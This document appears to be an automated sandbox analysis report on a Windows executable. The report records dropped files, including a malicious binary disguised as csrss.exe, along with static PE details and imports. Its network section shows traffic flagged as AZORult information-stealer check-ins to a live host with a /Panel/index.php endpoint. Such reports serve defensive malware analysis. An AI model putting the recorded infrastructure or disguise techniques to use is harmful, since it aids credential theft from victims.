                                                                  File Type:Microsoft Cabinet archive data, 36 bytes, at 0x24 "", number 1, 0 datablock, 0 compression
                                                                  Category:dropped
                                                                  Size (bytes):36
                                                                  Entropy (8bit):1.3753156176197312
                                                                  Encrypted:false
                                                                  SSDEEP:3:wDl:wDl
                                                                  MD5:8708699D2C73BED30A0A08D80F96D6D7
                                                                  SHA1:684CB9D317146553E8C5269C8AFB1539565F4F78
                                                                  SHA-256:A32E0A83001D2C5D41649063217923DAC167809CAB50EC5784078E41C9EC0F0F
                                                                  SHA-512:38ECE3E441CC5D8E97781801D5B19BDEDE6065A0A50F7F87337039EDEEB4A22AD0348E9F5B5542B26236037DD35D0563F62D7F4C4F991C51020552CFAE03B264
                                                                  Malicious:false
                                                                  Preview:MSCF....$.......$...................

                                                                  C:\Users\user\AppData\Local\Temp\$inst\temp_0.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File Type:Microsoft Cabinet archive data, many, 8199794 bytes, 2 files, at 0x2c +A "0" "1", number 1, 421 datablocks, 0x1503 compression
                                                                  Category:dropped
                                                                  Size (bytes):8199794
                                                                  Entropy (8bit):7.999668812958104
                                                                  Encrypted:true
                                                                  SSDEEP:196608:cIqkBPpjIwzMYsK6fg4/Lovsc+eQ5AdlH3sxAPflIKaQ:IkFAYsrfx8vJ+eQAd5sxAPmfQ
                                                                  MD5:5C4070FB5AA07BA7ED668328C8B0B428
                                                                  SHA1:FD82E7A296F18AA08C48CA6B2443F403198C299E
                                                                  SHA-256:1D7185461B65FB6B6502EC6766312340CF0EB31D0F70CA83BB50DAB99AF823C3
                                                                  SHA-512:9A824E09FC43626276DFBAF2E571AC862C2FF315835CC261219933A8106CA670724F138B2C43BB4C79E456748CC421BDB5669EAB7234196FAF107F78CB8F1724
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MSCF....r.}.....,...................P.........L.......dOG. .0......L....I....1.rO..x..[......>........=....J!...BA..q....BMR..A.PD.W..{7....fh.h.......Y`3.... 1LF....X.......t.A......<.z...m....su....e..X.^.u..u.{...t...nu...n...f.{`dw...\c.c................*.!...# .dJL.......L.....3 ......uH...8.K.@.|.D..j&[.$<.v.}.......f.d[d/gi/h/...4..].f^S/.`........P..F.i.B..[w./l........@/........W...S....u..................B......?...|.6..'..........v."..=......O.Z.._4....C...........}.......`~..r.F............[.FSF....l.-i..k..q............+......H..........J.?..(...k.@.:...:... (.#...4.H."..G..:.q....4.#..*..*.%.>.T..\....9.&0...U.%..T. h.&*...s5....QL..5....S.<....dW.q@0.c.#.....2.0...'.oC.8Q......`...PL...q...w...#...1..%.My.J$...8o..E`."B.....s....A....@..0.#o..7i..v.....ab...w5.n.q..._L....n.b.!.......,.7.J7i....w.....3.o@>u..U..^$.r.A.....&.p.... .Z_.+.......M._8..}..34..9a...@.f...^.......n.!u..2?.|..w....g.l..D......F...q.V...o.K.o.$..........m..L.N

                                                                  C:\Users\user\AppData\Roaming\csrss.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5027840
                                                                  Entropy (8bit):7.950049918944395
                                                                  Encrypted:false
                                                                  SSDEEP:98304:jb0VjUZy2jZW9h0v6LkkDo0zaE22e8chePGMBUuOzlR8ZhHvMe8I3:jKjUZyyPv6LvNmRR8PPcuOzlgtvMe
                                                                  MD5:2A0C555C70EB25094C94E4BA5A6BA131
                                                                  SHA1:AA23BC37987A9C802BA5331577776EF2AF1D07D8
                                                                  SHA-256:CB0E4FFD650EAB6AAD6E30252D4FF8A0DC1F4F4C21227E18CB39A43F38EBA1DF
                                                                  SHA-512:E601BF86A855CFC1107A88AE27E8DBE27D00ECAE99536218A46DB9CF0102F9CD533E1A1B698914C202ED3E9AA681FDAE1E8804407FEE4A781511A9AF7FF2508C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................*.......gJ...........@...........................{..................@....................E.O....9F.@....................................................................................p<.............................CODE....$........................... ..`DATA................................@...BSS.....]................................idata..............................@....vmp0....>-.........................`..`.vmp1... .L.. /...L.................`..`....................................................................................................................................................................@..P........................................................................................................................................................................................................................

                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1572864
                                                                  Entropy (8bit):4.293749385976843
                                                                  Encrypted:false
                                                                  SSDEEP:12288:fp8C8LpPuaO/Ehw7Ea5OHCxSvelqKruG6ZOBbdpaKELiNENR8UxNMtz:eC8LpPuaO/Ehw7Z+W
                                                                  MD5:75775F48D48EE4422AE3700E76F93726
                                                                  SHA1:C60F5D6E81406BCA405E0F99CB1879AF5C216927
                                                                  SHA-256:17D4626635666A3A02F313CD1386954D491755BE876A8F4FFAEC05225A0C08EA
                                                                  SHA-512:4A37099C88480C3DA85BBBC79006AF8627DEB44776D4F2A7F5DF8B2F1949F79975112DF6A515B79B44DAFD7CD5B5A7BC07D0DFF4186CFAC49E99925557053216
                                                                  Malicious:false
                                                                  Preview:regfj...j...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&...`_...............................................................................................................................................................................................................................................................................................................................................7..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):28672
                                                                  Entropy (8bit):3.8191681874552565
                                                                  Encrypted:false
                                                                  SSDEEP:768:xYARftx1JJ4JBHFAJGrq6HpukqQVSC9OGMY2hp:LdAjs
                                                                  MD5:B7324CFD72B5EE02DD5A56148095A4A4
                                                                  SHA1:E2C0C5F02EC00469EEA74FE0EB253FC13E7F0AE6
                                                                  SHA-256:59BEC8DD358347930867159D133205522C20E4CF8EBFA99460609DF444776774
                                                                  SHA-512:6C6EEB0C7C3F332135A552666E9FA010FB28C029544C4ED70B0F9CF71909B1E51B532736640309B1ACF30F3478ACE59192AB0C1B5BC487A9784E64FE3400A7D8
                                                                  Malicious:false
                                                                  Preview:regfi...i...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&...`_...............................................................................................................................................................................................................................................................................................................................................7..HvLE.n......i...........i.;.w........^|.........0...................0..hbin................p.\..,..........nk,....`_.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....`_...... ........................... .......Z.......................Root........lf......Root....nk ....`_...................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.993697571252843
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  File name:ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File size:8425933
                                                                  MD5:1ac70328ce1dea448647022c5b360a67
                                                                  SHA1:4f295ccfc7b7a2eeeec53df66d22743dbac301a6
                                                                  SHA256:addcdf9e3bac722442fb269492fea86e91d4e97ee5df4ca5c03515d534fb0c51
                                                                  SHA512:26192e10e1b095739fd2b193c199aa689b0f7d26d57bef9718ef1cee41b95e5b4113cc987cd1847a7a1f3e727f0601099bde92591d3e153ddb37fa36e4f897c5
                                                                  SSDEEP:196608:oKFIqkBPpjIwzMYsK6fg4/Lovsc+eQ5AdlH3sxAPflIKap:vkFAYsrfx8vJ+eQAd5sxAPmfp
                                                                  TLSH:788633695E98403ED946193008CBFE35B63FFE1C0A3754873BD99D5CB82B2899C1E25B
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:b369f1b1619132c1

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x425468
                                                                  Entrypoint Section:CODE
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:b8494300a1f7342d4c600a7b12e15925

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFF0h
                                                                  mov eax, 00425388h
                                                                  call 00007F0714FC77D9h
                                                                  mov eax, 004254C8h
                                                                  call 00007F0714FCA1DFh
                                                                  mov edx, dword ptr [00428840h]
                                                                  mov dword ptr [edx], eax
                                                                  mov edx, dword ptr [00428840h]
                                                                  mov edx, dword ptr [edx]
                                                                  mov eax, dword ptr [00428848h]
                                                                  call 00007F0714FE5999h
                                                                  mov edx, dword ptr [00428840h]
                                                                  mov edx, dword ptr [edx]
                                                                  mov eax, dword ptr [004287DCh]
                                                                  call 00007F0714FDEA2Fh
                                                                  mov eax, dword ptr [00428840h]
                                                                  call 00007F0714FCD461h
                                                                  call 00007F0714FC6694h
                                                                  add byte ptr [eax], al
                                                                  add bh, bh

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2b0000x1798.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000xb5d8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1884.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x2e0000x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  CODE0x10000x244cc0x24600False0.5598622744845361data6.594375997321255IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  DATA0x260000x28940x2a00False0.31556919642857145Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304023.7937570409882295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  BSS0x290000x10f50x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata0x2b0000x17980x1800False0.3977864583333333data4.8854949370233145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls0x2d0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rdata0x2e0000x180x200False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                  .reloc0x2f0000x18840x1a00False0.7889122596153846data6.586647864611828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x310000xb5d80xb600False0.3879635989010989data4.485448040748785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x313600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
                                                                  RT_ICON0x322080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
                                                                  RT_ICON0x32ab00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors
                                                                  RT_ICON0x331780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
                                                                  RT_ICON0x336e00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896
                                                                  RT_ICON0x379080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600
                                                                  RT_ICON0x39eb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                                                                  RT_ICON0x3af580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400
                                                                  RT_ICON0x3b8e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                                                                  RT_RCDATA0x3bd480x10data
                                                                  RT_RCDATA0x3bd580x110data
                                                                  RT_GROUP_ICON0x3be680x84data
                                                                  RT_VERSION0x3beec0x374dataRussianRussia
                                                                  RT_MANIFEST0x3c2600x376XML 1.0 document, ASCII text, with CRLF line terminatorsRussianRussia

                                                                  Imports

                                                                  DLLImport
                                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                  user32.dllGetKeyboardType, MessageBoxA
                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen
                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                  advapi32.dllRegCloseKey, OpenThreadToken, OpenProcessToken, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid, AdjustTokenPrivileges
                                                                  kernel32.dllWriteFile, WinExec, WaitForSingleObject, TerminateProcess, SystemTimeToFileTime, Sleep, SetFileTime, SetFilePointer, SetErrorMode, SetEndOfFile, ReadFile, OpenProcess, MultiByteToWideChar, LocalFileTimeToFileTime, LoadLibraryA, GlobalFree, GlobalAlloc, GetVersion, GetUserDefaultLangID, GetProcAddress, GetModuleHandleA, GetLocalTime, GetLastError, GetFileTime, GetFileSize, GetExitCodeProcess, GetCurrentThread, GetCurrentProcess, FreeLibrary, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, DosDateTimeToFileTime, CompareFileTime, CloseHandle
                                                                  gdi32.dllStretchDIBits, StretchBlt, SetWindowOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetDIBits, SetBrushOrgEx, SetBkMode, SetBkColor, SelectObject, SaveDC, RestoreDC, OffsetRgn, MoveToEx, IntersectClipRect, GetStockObject, GetPixel, GetDIBits, ExtSelectClipRgn, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CombineRgn, BitBlt
                                                                  user32.dllWaitMessage, ValidateRect, TranslateMessage, ShowWindow, SetWindowPos, SetTimer, SetParent, SetForegroundWindow, SetFocus, SetCursor, SendMessageA, ScreenToClient, ReleaseDC, PostQuitMessage, OffsetRect, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsIconic, InvalidateRect, GetWindowRgn, GetWindowRect, GetWindowDC, GetUpdateRgn, GetSystemMetrics, GetSystemMenu, GetSysColor, GetParent, GetWindow, GetKeyState, GetFocus, GetDCEx, GetDC, GetCursorPos, GetClientRect, GetCapture, FillRect, ExitWindowsEx, EnumWindows, EndPaint, EnableWindow, EnableMenuItem, DrawIcon, DestroyWindow, DestroyIcon, DeleteMenu, CopyImage, ClientToScreen, BeginPaint, CharLowerBuffA
                                                                  advapi32.dllRegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumKeyExA, RegCreateKeyExA, LookupPrivilegeValueA, GetUserNameA
                                                                  kernel32.dllWritePrivateProfileStringA, SetFileAttributesA, SetCurrentDirectoryA, RemoveDirectoryA, LoadLibraryA, GetWindowsDirectoryA, GetVersionExA, GetTimeFormatA, GetTempPathA, GetSystemDirectoryA, GetShortPathNameA, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetComputerNameA, GetCommandLineA, FindNextFileA, FindFirstFileA, ExpandEnvironmentStringsA, DeleteFileA, CreateFileA, CreateDirectoryA, CompareStringA
                                                                  gdi32.dllGetTextExtentPoint32A, GetObjectA, CreateFontIndirectA, AddFontResourceA
                                                                  user32.dllwvsprintfA, SetWindowLongA, SetPropA, SendMessageA, RemovePropA, RegisterClassA, PostMessageA, PeekMessageA, MessageBoxA, LoadIconA, LoadCursorA, GetWindowTextLengthA, GetWindowTextA, GetWindowLongA, GetPropA, GetClassLongA, GetClassInfoA, FindWindowA, DrawTextA, DispatchMessageA, DefWindowProcA, CreateWindowExA, CallWindowProcA
                                                                  shell32.dllSHGetFileInfoA
                                                                  comctl32.dllImageList_Draw, ImageList_SetBkColor, ImageList_Create, InitCommonControls
                                                                  ole32.dllOleInitialize
                                                                  oleaut32.dllSysAllocStringLen
                                                                  winmm.dlltimeKillEvent, timeSetEvent
                                                                  shell32.dllShellExecuteExA, ShellExecuteA
                                                                  cabinet.dllFDIDestroy, FDICopy, FDICreate
                                                                  ole32.dllOleInitialize, CoTaskMemFree, CoCreateInstance, CoUninitialize, CoInitialize
                                                                  shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHChangeNotify, SHBrowseForFolderA

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  RussianRussia

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  192.168.2.3141.8.192.15149695802029465 03/25/23-14:27:06.642541TCP2029465ET TROJAN Win32/AZORult V3.2 Client Checkin M154969580192.168.2.3141.8.192.151

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 25, 2023 14:27:06.580688953 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.641952038 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.642134905 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.642540932 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.703507900 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708403111 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708455086 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708488941 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708503008 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708519936 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708548069 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708560944 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708592892 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708611965 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708640099 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708659887 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708688021 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708724976 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708733082 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708759069 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708779097 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708794117 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.708825111 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.708882093 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.769632101 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769684076 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769721985 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.769730091 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769757986 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.769778967 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769824028 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769843102 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.769886017 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769893885 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.769932985 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769938946 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.769978046 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.769983053 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770023108 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770031929 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770068884 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770102978 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770112991 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770123005 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770162106 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770205975 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770207882 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770221949 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770252943 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770272017 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770303011 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770313978 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770349026 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770359993 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770395041 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770401001 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770440102 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770457029 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770486116 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770498037 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770530939 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.770539045 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.770597935 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832139015 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832206011 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832254887 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832292080 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832292080 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832299948 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832345009 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832349062 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832349062 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832391024 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832437992 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832446098 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832484961 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832513094 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832531929 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832547903 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832590103 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832598925 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832637072 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832648993 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832695007 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832709074 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832739115 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832747936 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832784891 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832791090 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832833052 CET8049695141.8.192.151192.168.2.3
                                                                  Mar 25, 2023 14:27:06.832845926 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.832895041 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.841717958 CET4969580192.168.2.3141.8.192.151
                                                                  Mar 25, 2023 14:27:06.902805090 CET8049695141.8.192.151192.168.2.3

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 25, 2023 14:27:06.475481033 CET6178753192.168.2.38.8.8.8
                                                                  Mar 25, 2023 14:27:06.561242104 CET53617878.8.8.8192.168.2.3

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Mar 25, 2023 14:27:06.475481033 CET192.168.2.38.8.8.80xa238Standard query (0)f0355889.xsph.ruA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Mar 25, 2023 14:27:06.561242104 CET8.8.8.8192.168.2.30xa238No error (0)f0355889.xsph.ru141.8.192.151A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • f0355889.xsph.ru

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.349695141.8.192.15180C:\Users\user\AppData\Roaming\csrss.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Mar 25, 2023 14:27:06.642540932 CET93OUTPOST /Panel/index.php HTTP/1.1
